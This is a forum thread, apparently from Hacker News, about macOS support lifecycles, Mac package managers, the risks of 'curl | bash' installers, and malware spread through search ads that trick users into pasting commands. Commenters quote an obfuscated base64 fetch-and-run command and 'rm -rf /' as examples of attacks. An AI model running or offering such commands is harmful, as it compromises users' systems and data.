More than six. 2019/2020 Intel Macs get Tahoe 26.0 + about three years of security patches for Tahoe. The last Intel Mac will be out of support in probably late 2028.
Well, my iMac Pro is not getting Tahoe. That's an Intel Mac. No idea why they figured that's their line in the sand.
The iMac Pro is a 2017 computer, although it was sold until 2021. So given that it runs Sequoia, that's anywhere from six to ten years of OS support. OCLP will probably figure out how to patch Tahoe for the iMac Pro soon enough, but until then, you can rejoice in the fact that you don't have to run Tahoe.
It could be worse -- at least you didn't spend tens of thousands on a 2019 model Intel Mac Pro in 2023. (Yes, they still sold them, and owners of those will be SOL in 2028. That's probably the worst OS support story in recent Apple history, and it's for some of their most expensive machines)
Actually you are correct. I've been following the HN threads about Tahoe and even watched a few YouTube videos and could only facepalm.
But then again I'll get rid of the iMac Pro this year. I'll have technicians butcher it and salvage whatever they can from it -- I suspect only the SSD will survive -- and will then tell them to hollow it out and put an R1811 board inside it so I can use it as a proper standalone 5K screen. I don't care about Macs anymore, they limit me too much and I can't maintain multiple Linux machines just when I figure I would want to do something that Macs can't do (like experiment with bcachefs or ZFS pools and volumes and snapshots for my continually evolving backup setup).
Fair. The screens are really beautiful, absolutely worth reusing if possible.
I'll be decommissioning 40+ 2020 27" iMacs this year (i9-9900, 32 GB) and it's such a shame to see so many great displays and otherwise functional and plenty fast computers become, essentially, e-waste.
I agree, it is a huge shame. And the R1811 boards are more or less 300 EUR (~360 USD). Not many companies would agree to spend $360 on a near-future e-waste, per device, just to be able to extract the high-quality display. True shame.
But I've learned my lesson. While Apple computers served me well from 2019 to 2026, macOS gets less and less usable for me; the bunch of things I want to be able to do on it only increases, and its appeal only decreases (not to mention the very justified OCD I get when I look at how much crap is running 24/7 on it!).
The iPhone stays, though I wonder for how long more. But the Mac will be on its way soon enough.
Why not use MacPorts, which currently supports all the way back to Leopard, has far more packages than Homebrew, has a better design, and was created by the creator of the original FreeBSD ports system who also worked on Apple's UNIX team?
The ubiquity of Homebrew continues to confound me.
+1
I guess I ran into the same thing. I try to install anything with Homebrew and it takes forever then breaks.
I went to macports because of that. Not looking back
The whole Apple ecosystem demands continual updates. You don't buy Apple and then complain about it.
Homebrew and MacPorts unfortunately do not fit the macOS installation layout very well anymore. Packages installed outside the usual places create a lot of headaches during updates.
I have preferred not to use them for the last 16+ years, and I'm not planning to start.
I wish mac users would stop using homebrew and use a real package manager with actual dependency management.
At the very least, replace homebrew with something like devbox which has `devbox global` for globally managing packages, it uses nix under the hood, and it's probably the simplest most direct replacement for homebrew.
I don't agree this is an issue and I'll tell you why: Homebrew isn't responsible for keeping the system functional like apt or pacman, it's a supplemental thing. I've also found it's useful in this capacity on Linux specifically with LTS distros, I can get the latest fzf or zoxide or whatever without having to add some shady repo.
This is how I see/use brew as well, and being able to just blow the directory away anytime and start over if need be is nice.
It's not a "system" package manager, nor was it ever meant to be. Its supplemental. I've also found it valuable on the various immutable linux distros.
I use MacPorts because of older versions of Homebrew having a weird and insecure design. [1] I think some of those design issues may have been fixed, but I’m wary of Homebrew.
[1]: https://saagarjha.com/blog/2019/04/26/thoughts-on-macos-pack...
It's not necessary because Mac applications shouldn't have any dependencies other than the OS. (Whatever additional libraries they use should be included.) This should also be true of basic developer tools. Once you're in a particular ecosystem, tools like deno, npm, or uv can handle their own dependencies.
Alternatively, you could do development in a container and use apt-get there. That's probably safest now that we're using coding agents.
I wish the mac users would switch to a real OS, linux, so that software companies would release linux versions of stuff first.
Codex, Claude Desktop, etc etc all starting out as "macOS exclusive" feels so silly when they're targeting programmers. Linux is the only OS a programmer can actually patch and contribute to, and yet somehow we've got a huge number of developers who don't care about having a good package manager, don't care about being able to modify their kernel, don't care about their freedom to access and edit the code of the software they rely on to work...
It's depressing how much of the software industry is just people on macbooks using homebrew to install a newer version of bash and paying $5 for "magnet" to snap windows to the corners since their OS holds them in a prison where they can't simply build themselves a tiling window manager in a weekend.
The OS is core to your tools and workflows, and using macOS cedes your right to understand, edit, and improve your OS and workflows to a company that is actively hostile to open source, and more and more hostile to users (with a significant increase in ads and overly priced paid services over the years).
Anyway, yeah, homebrew sucks. At least nix works on macOS now so there's an okay package manager there, but frankly support for macOS has been a huge drag of resources on the nix ecosystem, and I wish macOS would die off in the programming ecosystem so nix could ditch it.
I harbor similar sentiments, but I understand why OpenAI, Anthropic, Zed, etc begin with a macOS version. They're able to target a platform which is a known quantity and a good jumping off point to Linux.
I'm writing software for Linux myself and I know that you run into weird edge case windowing / graphical bugs based on environment. People are reasonably running either x11 or wayland (ecosystem is still in flux in transition) against environments like Gnome, KDE, Sway, Niri, xfce, Cinnamon, labwc, hyprland, mate, budgie, lxqt, cosmic... not to mention the different packaging ecosystem.
I don't blame companies, it seems more sane to begin with a limited scope of macOS.
The problem is that right now I have to choose the lesser of 2 evils. I hate what W11 has become. I only use it for games at the moment and the only reason is that some games Apex/BF6 do not run under proton because of their anticheat.
And I also hate what modern Macos is heading towards. I'm still ignoring/canceling the update on both my devices for the new "glass" interface.
And a thinkpad running Linux is just not doing it for me. I want my power efficient mac hardware.
Truth be told I just want to have my mbp running Linux. But right now it's not yet where it needs to be and I am most certainly not smart enough to help build it :(
> And a thinkpad running Linux is just not doing it for me. I want my power efficient mac hardware.
I'm using a decade old thinkpad running linux and it is definitely 'doing it for me'. And I'm not exactly a light user. Power efficient mac hardware should be weighed against convenience and price. The developer eco-system on Linux is lightyears ahead of the apple one, I don't understand why developers still use either Windows or the Mac because I always see them struggle with the simplest things that on Linux you don't even realize could be a problem.
Other OSs feel like you're always in some kind of jailbreak mode working around artificial restrictions. But sure, it looks snazzy, compared to my chipped battle ax.
> And a thinkpad running Linux is just not doing it for me. I want my power efficient mac hardware.
Are you talking about the battery? I bought a T16 AMD a month ago with the 86Wh battery and it lasts between 8 and 12 hours depending on usage. Not as much as a MacBook, but enough to not worry too much about it. The new Intel ones are supposed to be much better on power efficiency.
It's of course one level below the Mac in that regard (and maybe others too), but if you want to use Linux, I think the trade-off is worth it.
It's Apple, not the users, that need to make that switch in the first instance. I'd love to use Linux again but I'm not leaving Apple hardware for it, or accepting poor software support for recent hardware.
It's a question of priorities, I guess.
I admit I love the mbp hardware, but I can't stand macos anymore. So when my work computer was up for replacement, I didn't think twice and went with a PC, the latest thinkpad p14s. Everything works out of the box on Linux.
Is it as nice as a mac? No, especially the plastic case doesn't feel as nice under the hands as a mac's aluminum, the touchpad is quite good but worse than a mac's, and there are some gaps around the display hinge. But the display itself is quite nice (similar resolution, oled, although not as bright as a mac's), it's silent and it's plenty fast for what I do. I didn't pay for it, so I don't directly care about this point in this situation, but it also cost around half of what an equivalent mbp would have cost.
I also haven't tried the battery life yet, but it should hold at least as well as my 5-yo hp elitebook, which still held for around 5 hours last year. I basically never use it for more than an hour unplugged, so battery life is low on my priorities.
I dunno, I'm pretty happy with my thinkpad. Even if I could run Linux flawless on a macbook (which you can't unfortunately) I'd still take the thinkpad hardware over a macbook.
A macbook air is 1.25kg, and my thinkpad is 910g, and I can really feel that difference. The thinkpad keyboard also feels ever so slightly better too... and Linux working well is worth more than pretty much anything else.
>but I'm not leaving Apple hardware for it,
It's ok, Apple knows this and will lock its OS down into an iPhone-like OS step by step until you're boxed into a nice little prison, and you'll accept it.
Also you'll pay them 30% on every transaction you do on said computer.
I'd say support for linux has improved an incredible amount compared to 5-10 years ago. I'm often pleasantly surprised when ever a linux version of something is available because I'm used to not expecting that haha.
Tell me which OS you’re using that allows you to code your own viable tiling manager in a weekend?
Is it really a sin to pay for software to augment your OS? Like programmers make their living selling that and it’s horrible?
MacPorts has existed since 2002 and was invented by Jordan Hubbard, who created the original FreeBSD ports system and was also employed on Apple's UNIX team.
The package management story on Linux is hideously bad. The next generation replacements are all over the place (do I use snaps? Flatpak?). No one is going to learn Nix if it means you need to become a programmer just to install something.
The graphics story on Linux also sucks. I recently tried to convert my Windows gaming machine to Linux (because I hate W11 with a burning passion). It does work, but it’s incredibly painful. Wayland, fractional scaling, 120+ Hz, HDR. It’s getting better thanks to all the work Valve etc are putting in, but it’s still a janky messy patchwork.
MacOS just works. It works reliably. Installing things is easy. Playing games is easy. I’m able to customize and configure enough for my needs. I love it and I hope it sticks around because there is no way in hell I would move my work machines over to Linux full time.
> Wayland, fractional scaling, 120+ Hz, HDR
What's wrong with those? I don't have a single screen which does 120 Hz + HDR, but I'm typing this on a 120 Hz laptop, with variable refresh rate, at 125% scaling, and everything works great with Plasma (haven't tried anything else). I also have an external HDR screen, but it only does 60 Hz. It works great, too, doing HDR on it but not on the laptop screen (running at the same time, of course). They also run at different scaling (125% and 100%).
Now I don't know how to confirm that VRR is actually doing anything, but I can tell there's a difference between setting the monitor to 60 and to 120 Hz. HDR on the other screen also produces a clear difference.
This is all running from integrated intel graphics, maybe with other GPUs it's more of a crapshoot, no idea.
Huh? Homebrew supports and frequently uses dependencies between formulae. It’s a bit janky around upgrades in my experience, but you’re going to have to clarify what you mean.
I never use it when I can have my way.
The UNIX in macOS is good enough for my needs, and I manually install anything extra that I might require.
MacPorts was created by the creator of the original FreeBSD ports system who was also an Apple employee. It ought to be everyone's first choice for package management on macOS.
That wouldn't really help; it could be more naughty and use pastejacking so you don't even realize what's happening. That might end up catching a lot of people because, as far as I know, bash doesn't use bracketed paste by default, so you think you're pasting a real command and it ends up sending your secrets before you know what happened.
Disabling JS plus enabling bracketed paste seems to be the only good solution.
Btw the OP article uses a weird setup: why would they use `bash -c "$(curl $(echo qux | base64 -d))"` instead of just `curl | bash`?
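For what it's worth, bracketed paste can be enabled on older bash through readline; a one-line config sketch (supported since bash 4.4, and on by default since 5.1):

```shell
# Ask readline to use bracketed paste, so a pasted newline is inserted
# literally instead of executing the command immediately.
printf 'set enable-bracketed-paste on\n' >> ~/.inputrc
```

After reloading the shell (or running `bind -f ~/.inputrc`), a multi-line paste sits on the command line for review instead of running as it lands.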
Homebrew also installs through curl | bash, though recently they started offering a .pkg installer as well.
It's not really any different than downloading a binary from a website, which we've been doing for 30 years. Ultimately, it all comes down to trusting the source.
>> Attacks like this are not helped by the increasingly-common "curl | bash" installation instructions ...
> It's not really any different than downloading a binary from a website, which we've been doing for 30 years.
The two are very different, even though some ecosystems (such as PHP) have used the "curl | bash" idiom for about the same amount of time. Specifically, binary downloads from reputable sites have separately published hashes (MD5, SHA, etc.) to confirm what is being retrieved along with other mechanisms to certify the source of the binaries.
If the attacker already controls the download link and has a valid https certificate, can't they just modify the published hash as well?
Which is the reason why it's better to actually cryptographically sign the packages, and put a key in some trusted keystore, where it can actually be verified to belong to the real distributor, as well as proving that the key hasn't been changed in X amount of days/months/years.
Still doesn't address the fact that keys can be stolen, people can be tricked, and the gigantic all-consuming issue of people just being too lazy to go through with verifying anything in the first place. (Which is sadly not really a thing you can blame people for, it takes up time for no easily directly discernable reason other than the vague feeling of security, and I myself have done it many more times than I would like to admit...)
Which is why package managers with well-maintained repositories are the civilized solution to software distribution. Unfortunately the Linux world has been dedicating a lot of energy to making Windows-style "download and run the exe" possible on Linux.
>Which is why package managers with well-maintained repositories are the civilized solution to software disruption.
How does that model work with distros like debian, where they freeze package versions and you might not get claude code until 2027 (or whenever the next release is)?
Sounds like you either shouldn't use Debian or should find a repo with maintainers who align with your preferred style of package inclusion.
In principle you could even make such a repository, or otherwise promote one.
If the debian maintainers don't align with your preferences you can:
1. Create your own apt repository with newer software, and install from that. It's easy to package things, you can share the repository with trusted friends, running linux with friends is fun.
2. You can switch to a distro, like NixOS or Arch, which values up-to-date software more than slow stable updates.
Debian does seem to be more aligned with mailservers and such, where updates can be slow and thoughtful, not as much with personal ai development boxes where you want the hot new ai tool of the week available asap.
... Either way, learning to package software correctly for your distro of choice is a good idea, it's fun to bang out a nix expression or debian package when you need to install something that's not available yet.
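To gesture at how small that job can be, here is a toy hand-rolled .deb: just a control file plus a filesystem tree (every name and field below is invented):

```shell
# Build a minimal demo .deb with dpkg-deb; nothing here is a real package.
mkdir -p mytool_1.0/DEBIAN mytool_1.0/usr/local/bin

# The control file is the only required metadata.
cat > mytool_1.0/DEBIAN/control <<'EOF'
Package: mytool
Version: 1.0
Architecture: all
Maintainer: You <you@example.com>
Description: toy demo package
EOF

# The payload: one executable script installed to /usr/local/bin.
printf '#!/bin/sh\necho hello from mytool\n' > mytool_1.0/usr/local/bin/mytool
chmod +x mytool_1.0/usr/local/bin/mytool

dpkg-deb --build mytool_1.0   # produces mytool_1.0.deb
```

Real distro packaging adds dependencies, changelogs, and policy checks on top, but the basic shape is this simple.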
And installing a .deb package is equivalent to executing arbitrary code as root so I'm not sure what this actually buys you in security terms.
I would love for folks to start packaging their software for major distros if for no other reason than to see just how annoying the tooling is to use.
I've heard this time and time again from new Linux users: "I don't want to learn the command line, I just want to be able to install and run whatever I want"
You don't need command line for installing packages, though
Doesn't matter, they'll need to use it eventually for something, freak out, and go back to windows.
On the Mac, binaries need to be signed and notarized, and Apple could stop the spread of the malware once it's identified, or even detect it before notarizing it.
I've downloaded and installed too many packages where the developers didn't bother with this, but I uncritically went to Mac's security settings to let it do its thing anyway.
I don't know if developer utilities can be distributed through the app store, but they should be so that Apple can review them properly. Criticisms aside, the iOS App Store and the iOS security model has been the best thing for software security (especially for lay-people), ever.
Apple controlling CLI utilities is one of those supposedly good ideas that would actually be bad.
They can’t stop themselves from tightening their grip ever tighter, and always want to ensure you have no functionality above what they deemed sufficient.
Apple taking over Homebrew would be a disaster.
What's the security benefits of using homebrew? Isn't it just another layer of redirection before downloading the software?
There are some real differences.
All the homebrew packages have checksums and are versioned in git, so if the upstream website is compromised and a malware installer is put in place of the package, `curl | bash` will just install the malware, while `brew` would start erroring out and refuse to install after downloading something with a different checksum.
You also get an audit log in the form of the git repo, and you also ensure everyone's downloading the same file, since `curl | bash` could serve different scripts to different IPs or user-agents.
I don't think brew does proper build sandboxing, so something like a `./configure.sh` script could still download some random thing from the internet that could change, so it's only a bit better.
If you want proper sandboxing and thus even more security, consider nix.
A civilized person of course would use either MacPorts or a proper native macOS installer package.
Civilization is about cooperating with your fellow man to build great things, not bowing to the feudal lord Apple Inc.
A truly civilized person would use Linux, OpenBSD, etc, a free operating system where they may contribute fixes for their fellow man without having to beg at the boots of the single richest company on the planet with radar numbers asking for fixes from on high.
Apple are just number two, half a trillion behind nVidia. Hopefully that’ll soon change when the bubble pops.
A homebrew tap is really a lateral move from a safety perspective and still usually invoked by pasting into the command line.
And donate to Homebrew, like a civilised person
Maybe tools like https://github.com/vet-run/vet could help with these projects that would rather you use their custom install script instead of complying with distro-specific supply chains.
Meanwhile, homebrew install instructions:
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/inst...)"
Then it prompts the user for admin privileges. Also, it does not support installing as a local non-admin user.
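For what it's worth, the usual mitigation for any `curl | bash` installer is to download to a file, read it, and only then run it. Sketched here with a local `fetch` function standing in for the real curl fetch of Homebrew's install.sh:

```shell
# Download-inspect-run instead of piping straight into bash.
# fetch() is a local stand-in for something like:
#   curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh
fetch() { printf 'echo "installing..."\n'; }

fetch > install.sh          # 1. save to disk instead of piping to bash
# 2. actually read install.sh (e.g. `less install.sh`) before step 3
output=$(sh install.sh)     # 3. run it only once you're satisfied
echo "$output"
```

This also defeats the trick where a server detects mid-pipe execution and serves a different script than the one you'd see in a browser.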
I would agree if it was the only way to install Homebrew, but it is not.
You can install it via a .pkg here: [0]
[0] https://github.com/Homebrew/brew/releases/tag/5.0.13
MacPorts, of course, features an actual .pkg installer, as well as doing pretty much everything else better, and having more packages, and existing first.
I use brew but am willing to try out MacPorts. How come the package install instructions seem to require sudo under MacPorts? Does that not carry more risk during the install?
Does it still do the "you can't install via sudo, that's a security risk" while not allowing a non-admin install? I laugh and I cry.
Why does anyone trust that project to understand security?
As if homebrew is any more secure. The only reason to use homebrew is convenience.
I agree about the proliferation of curl | bash, but homebrew is not the answer.
They cut support for old platforms way too fast and, in essence, try to dictate far too much.
> Never follow a shortened link without expanding it using a utility like Link Unshortener from the App Store,
I am unfamiliar with the Apple ecosystem, but is there anything special about this specific app that makes it trustworthy (e.g: reputable dev, made by Apple, etc.)? Looking it up, it seems like an $8 app for a link unshortener app.
In any case, there have been malicious sites that return different results based on the headers (e.g: user agent. If it is downloaded via a user-agent of a web browser, return a benign script, if it is curl, return the malicious script). But I suppose this wouldn't be a problem if you directly inspect and use the unshortened link.
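The header-based cloaking described above is easy to sketch. The `serve` function below is a toy stand-in for a malicious endpoint that branches on the User-Agent string it sees, so the page you previewed in a browser is not what `curl | bash` would actually execute:

```shell
# Toy illustration of user-agent cloaking: the same "endpoint" hands a
# benign page to browsers and a payload to curl-like clients.
# Purely local; serve() stands in for a malicious web server.
serve() {
    case $1 in
        curl*) echo 'echo pwned  # malicious script' ;;
        *)     echo '<html>benign docs</html>' ;;
    esac
}

browser_view=$(serve "Mozilla/5.0")
curl_view=$(serve "curl/8.4.0")
```

Since the two responses differ, "I checked the page in my browser first" gives no assurance about what the pipe-to-shell fetch receives.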
> Terminal isn’t intended to be a place for the innocent to paste obfuscated commands
Tale as old as time. Isn't there an attack that started getting popular last year on Windows: a "captcha" asking you to hit Super + R and paste a command to "verify" your captcha? But I suppose this type of attack has been going on for a long, long time. I remember Facebook and some other websites used to have a big warning in the developer console, asking users not to paste scripts they found online there, as they are likely scams and will not do what they claim to do.
---
Side-Note: Is the layout of the website confusing for anyone else? Without borders on the image, (and the image being the same width of the paragraph text) it seemed like part of the page, and I found myself trying to select text on the image, and briefly wondering why I could not do so. Turning on my Dark Reader extension helped a little bit, since the screenshots were on a white background, but it still felt a bit jarring.
DO NOT GOOGLE EXPRESS VPN!
The GitHub links are some of the nastiest malware I have ever encountered in my life!
It steals your Apple Keychain, all your "Safe" Passkeys, your Google Chrome "Saved Passwords", even your KeePass Database!
Login and security are still not sufficiently attack-proof for the most important things in life like your bank, email, wallets, and social logins.
Your "logged-in Sessions" also get stolen! It's unbearable that most cookies expire in months "ON THE SERVER SIDE"! You have no control and can't log the attacker out!
It happened to me when I was in China and searched for ExpressVPN. Because the main website wouldn't load, the GitHub link seemed like an alternative.. damn.. I changed my Google password 5 times and the attacker was still able to log in; it was so devastating! I had to change my email passwords multiple times too.
Sessions are what make logins valid, and this is the weakest link of all. I wish sessions used Off-The-Record-style encryption with one-time pads, such that each access requires a new key that can only be derived with a valid reply, ensuring the attacker can be logged out safely.
You have to consider your machine and all others you connected to to be compromised. Time to reinstall every device with new accounts and passwords. With unused usb sticks and images downloaded from another network you were never connected to.
Did you download anything? A bad link isn't going to do all of that, unless some nation-state actor is dropping zero-days on random people via Google search. You most likely downloaded a trojan with a Lumma stealer, and your computer is probably still compromised.
This is very close to something that happened to a friend of mine. They were trying to follow a MoltBot installation guide, but clicked on a different link that looked legitimate. That page instructed them to paste a command into Terminal. After running it, macOS immediately started asking for multiple permissions, which in hindsight was the big warning sign. But someone non-technical might have run with it.
> After running it, macOS immediately started asking for multiple permissions, which in hindsight was the big warning sign.
From what I understand of MoltBot, I would expect it to ask for a lot of permissions. I guess maybe they are prompted closer to configuration time in the actual app.
Yeah they are both acting as a RAT essentially. Just one is in your control and one isn’t.
This might sound stupid, but I have my own index, of trusted domains:
https://github.com/rumca-js/Internet-Places-Database
I start with it to find stuff I know. If there is stuff I don't know that is important to me, I add it to my database.
It also forces me to verify each link I visit. So the links I visit are mostly OK.
Though I sometimes use ChatGPT for instructions, and if someone poisoned the well well enough, it might spread malware.
This curl | shell installation pattern is actually insane. It was insane 10 years ago and it will still be insane 10 years from now. Do not do it.
I imagine that an AI agent like OpenClaw, if given browser access and system control with Peekaboo or similar could easily fall prey to this attack.
GitHub too https://iboostup.com/blog/ai-fake-repositories-github
Google falling from grace. What happened to it? Google Search used to be useful in the past.
Hasn't AdSense been known to be a malware delivery vector for over a decade by now?
https://www.securityweek.com/malvertising-campaign-abuses-go...
Money. This is all thanks to AdSense.
Confirmed. The professional term is "enshittification". Nowadays, I just use https://altpower.app
At least macos has file access permissions.
You're referring to [Sandboxing] Mandatory Access Controls [0]. Windows doesn't implement MAC in the same way, instead using Mandatory Integrity Controls [1].
[0] https://developer.apple.com/library/archive/documentation/Se...
[1] https://learn.microsoft.com/en-us/windows/win32/secauthz/man...
Windows implements ACLs in a far more granular way than macOS and most other Unices, however (with the exception of Slowaris).
Windows can implement these things as much as they like, but if you paste a command into cmd.exe, it can access your files with no popup like the one macOS gives you.
Yes, same thing will happen on macOS.
Comparing to DOS or what? No one runs Win10/11 on FAT now, while NTFS has access permissions and ACLs.
I remember that Win32 apps on Windows 10 and 11 can do whatever they want with the user's personal files. Has that changed?
In Windows, access to files is controlled by ACLs when NTFS is used (dating back to NT 3.1 with NTFS). So it depends on which user runs a process.
Basic hygiene is very simple: never run as Administrator. Create and use a regular user or a power-user account. It's similar to regular Linux practice. Use the Administrator account only when needed.
GP is talking about isolation inside the current user. Recent macOS versions ask before allowing a program to access files inside Documents, Desktop, etc. Whether that helps or not is debatable, but it’s not quite the same as what Windows ACLs do out of the box. To achieve the same on Windows, one would have to run the program as a different user to which they’d selectively grant access to the folders inside their profile.
You can enable controlled folders on Windows: https://learn.microsoft.com/en-us/defender-endpoint/controll...
It's not enabled by default, though. Enabling it by default would probably break just about every Windows program out there and like UAC on Vista, everyone would turn it off immediately.
You can create a separate user, but even a user in the administrators group doesn't have an admin token until elevation.
If you trust yourself to not blindly click OK on every UAC prompt, a single user account in the admin group is fine.
> never run as Administrator.
Computer asks for password. I type in password.
Admin access prompts are honestly a joke even on macOS. The source is completely opaque.
Win32 Apps can access anything you can access and also read out some text fields from apps you have running, via accessibility APIs.
https://learn.microsoft.com/en-us/defender-endpoint/enable-c...
What does that even mean? NTFS file access permissions (35 years old at this point) are far more powerful than 1970s-era Unix permissions model.
It's referring to the fact that Terminal doesn't have free access to all your files and folders, despite what the traditional file access perms say.
Windows has this too, but it's off by default. I forgot what it's called, that's how often it gets used.
He’s talking about sandboxing and permissions prompts
I reported one of these recently. It was also related to clearing space, specifically system files. It was the second top sponsored link and presented as an Apple support page. The styling was very convincing, with the only giveaway being the url.
A day later my parents called me very stressed out about a popup on my mother’s iPhone saying she had been hacked. I asked them to take a screenshot, and again it was a website that was styled to look like a modal on top of an iOS Settings app page. With the new UI this was extremely effective, as the page title is just a tiny thing down at the bottom in the scrolled state.
I don’t know what is going on, but I’d assume the problem is AI moderation.
Are we still pushing the myth that anti-malware on Mac isn't necessary?
I support quite a few Mac users and never recommend it myself. I also own a couple of Macs and don’t use it.
I do occasionally use an app to clean somebody’s Mac of an irritating browser search hijack. I’ve never seen anything else.
Why should I change my mind?
How does antivirus software protect users who paste malicious commands they find online into the terminal?
By scanning downloaded binaries for known viruses?
A text command pasted into the terminal isn't a binary.
Convincing a Linux user to paste rm -rf / into the terminal is not malware. It's social engineering.
Scanning binaries for known malware is already built into the OS.
Endpoint security software on the Mac (if it's worth the hit to system resources, that is) inspects every call to exec and fork that occurs in the kernel and also inspects them for known attack vectors, malicious scripts, etc. The one I have installed on my work Mac will kill reverse-shell attempts before they run. It will stop keychain attacks and infostealing (as it also sees every filesystem op as it happens in the kernel).
Gatekeeper and Xprotect are good, but there's only so much they can do.
Which do you use/recommend?
Antivirus programs will scan PowerShell scripts, VBScript files, JScript files, and all other kinds of automation on Windows.
The screenshots from the article clearly show a permission prompt for a program. Whether that's a binary or a shell script or something else doesn't matter, the infection stage should've been caught by anti malware rather than permission prompts.
Windows Defender does this already. If Apple's AV can't catch this, I think they may be relying on their DRM-as-a-security-measure (signatures, notarisation, etc.) a bit too much.
> Scanning binaries for known malware is already built into the OS.
Clearly it isn't. XProtect is a joke. It's 2004-era ClamAV level of protection.
The article specifically mentions that the methodology here is to trick users into running an obfuscated CLI command…that downloads and runs a binary
Terminal commands have the ability to do dangerous things, like deleting all the user's files.
In this case, the user is warned that the command wants to do something dangerous and must manually allow or deny the action.
No, that narrative died around 2010. The existence of malware targeting Macs has driven many macOS security improvements since, many of which are taken personally by HN readers.
As of today you don't need to install one on Windows either. Both OSes have built-in software for this purpose.
XProtect (Apple's built-in antimalware) is usually all you need, as long as you're at least somewhat savvy (and sometimes even if you aren't). I believe installing any additional antimalware on a Mac is a waste of resources.
No, we're using the built-in mac anti-malware app
It is necessary. That’s why Apple ships a free invisible one bundled into the OS that you never have to think about, see, or update.
a docs entry point - https://support.apple.com/en-mide/guide/security/sec469d47bd...
What anti-malware would have stopped this, exactly?
It seems most anti-malware is the equivalent of the TSA - security theatre that wastes your time and attention, catching plenty of water bottles but not the real stuff.
We should not outsource security to Google.
If someone prepares a legit-looking web page instructing people to download and run malware, we'd better learn more about security and caution before blindly following those directions.
Why should it be Google's (or Bing's) duty to filter those out?
Why should Google be responsible for content they accept money to promote on their website, and then elect to disguise as "natural" search results specifically in order to trick you into clicking them without realizing they're ads?
The answers are in the question.
> Why should it be Google's (or Bing's) duty to filter those out?
Google intentionally disguises ads as search results, and even lets advertisers present a fake URL. When the system's purpose is to profit from tricking inattentive users, I think they should take on some liability for the outcome of what they're tricking people into doing.
Not to say that better teaching security isn't also a good idea.
True, but Google shouldn't be allowing obvious malware advertisements on their platform.
It may not be their duty to filter it out, but it should definitely be their duty to not take money to bump it to the top of their results. Let the algorithm dump random unlinked medium posts on the 5th page where they belong
What is an 'AMOS stealer'?
https://www.malwarebytes.com/blog/detections/osx-atomicsteal...
Actually… I think this can be solved by AI answers. I don’t look up commands on random websites; instead I ask an LLM for that kind of stuff. At the very least, check your commands with an LLM.
What we used to have, 15 years ago, was a really well-functioning Google. You could be lazy with your queries and still find what you wanted in the first two or three hits. Sometimes it was eerily accurate at figuring out what you were actually searching for. Modern Google is just not there, even with AI answers, which are supposed to be infinitely better at natural language processing.
15 years ago there were fewer content farms trying to get your clicks.
I think that played a somewhat smaller role than Google seemingly gradually starting to take its position for granted and so everything became more focused on revenue generation and less focused on providing the highest quality experiences or results.
Beyond result quality it's absurd that it took LLMs to get meaningful natural language search. Google could have been working on that for many years, even if in a comparably simple manner, but seemingly never even bothered to try, even though that was always obviously going to be the next big step in search.
Google could afford to manually exclude the content farms if they didn't morph from a search company to an advertising company.
Google was such a revelation after the misery of Alta Vista and kin. I miss the days when I liked them.
We used to have an endless supply of new search engines, so "SEO" was not viable. Then Google got a monopoly on search, DoubleClick reverse-acquired Google, and here we are.
Yesterday I was debugging why on Windows, my Wifi would randomly disconnect every couple hours (whereas it worked on Linux). Claude decided it was a driver issue, and proceeded to download a driver update off a completely random website and told me to execute it.
My point is, this is not solved by AI answers.
Claude didn’t simply “proceed to download a driver update off a completely random website and told me to execute it”
You had to disable permissions or approve some of that.
Don’t the LLMs get their information from these random websites? They don’t know what is good and what is malware. Most of the time when I get an AI answer with a command in it, there is a reference to a random reddit post, or something similar.
LLMs will allow malicious actors to sneak backdoors into the dataset. Most of the popular LLMs use some kind of blacklisting instead of a smaller, specific/specialised dataset. The latter seems more akin to whitelisting.
FTFA: “This is almost identical to the previous attack via ChatGPT.”
Could the dataset of the LLMs that made these recommendations have been poisoned by, let's say, a Honeypot website specifically designed to cause any LLM that trains on it to recommend malware?
Thanks for reminding me to turn off Full Disk Access for Terminal. I'm not sure why I had that one turned on.
Probably because you can’t even properly `ls` system directories without it.
depends which directories…
What would you do in the terminal without it?
I was able to install homebrew, install yt-dlp and download some movies to watch during a flight. All without full disk access.
I was also able to use sudo to remove /opt/homebrew afterwards.
Because it is useless without it?
lol, is this serious? The final straw with Mac for me was when I accidentally hit “No” when asked if I wanted to give my terminal access to the file system. All of a sudden I was starting my work day without a working terminal. Obviously there was a solution, probably an easy one, but I didn’t even look for it.
> The final straw with Mac
> Obviously there was a solution, probably an easy one, but I didn’t even look for it
It's hard to take this seriously. It's the most obvious setting possible. Settings > Privacy & Security > Full Disk Access > tick the apps you want to have it.
What's even the complaint here? That Mac has solid app permissions, but you can't be bothered to open the settings?
I said it was likely an easy solution. Glad to see my intuition was correct!
I also said it was the “final straw”. No worries at all if you’re not familiar with that expression. It means that there were lots of similar slights previously, and that the event I mentioned, while minor, was the one that finally pushed me to make the decision I made.
> No worries at all if you’re not familiar with that expression.
I'm not contesting that it was the final straw, I'm contesting it was a straw at all. "I want to change a setting but am too lazy to open the settings" is not an argument against Macs, it's a piece of evidence that you don't know how to operate a computer.
> I also said it was the “final straw”. No worries at all if you’re not familiar with that expression. It means that there were lots of similar slights previously, and that the event I mentioned, while minor, was the one that finally pushed me to make the decision I made.
This sort of patronizing assholery is childish and unbecoming. Your comment would've been better without it.
My comment wouldn't exist without it.
> you can't be bothered to open the settings?
This kind of crap ticks me off and makes me respond in kind. I should be better, sure, but sometimes I'm not.
The solution is to enable Full Disk Access in settings.
Are you sure? This felt like it was specific to iTerm. Like I’d have to scroll a list of apps, find it, and modify what it’s allowed to access.
Careful out there.
Another reason to avoid Medium like cold grits.
This sucks because the web should be the perfect, safe platform for this kind of application, but it isn't. Technically all the features exist in the browser such that you could write a homedir cleaner, space analyzer, etc. purely in a browser tab, but because of the misguided (in my opinion) way that browsers refuse to open a homedir, it's impossible.
I'm not sure letting a webapp access your home is a good idea. You're basically YOLOing random remote code to run on your machine. Maybe we can have it access some specific folder for its own data.
And then there's also Apple which won't allow functional web apps, lest it affects their app store 30% cut.
Seems like a great idea for something to just run inside a chroot jail (or the modern equivalent, a container).
The web already has these APIs, it can be granted read-only permissions to designated directories. But the browsers will refuse to allow you to delegate even read-only access to, for example, the macos ~/Applications folder, on the pretty shaky basis of it being "system files". Because of that policy the API is not useful for the application of a space analyzer.
> browsers will refuse to allow you to delegate even read-only access to, for example, the macos ~/Applications folder, on the pretty shaky basis of it being "system files"
If you want to trash your system I believe nothing prevents you from giving Firefox full-disk access.
Is this satire?
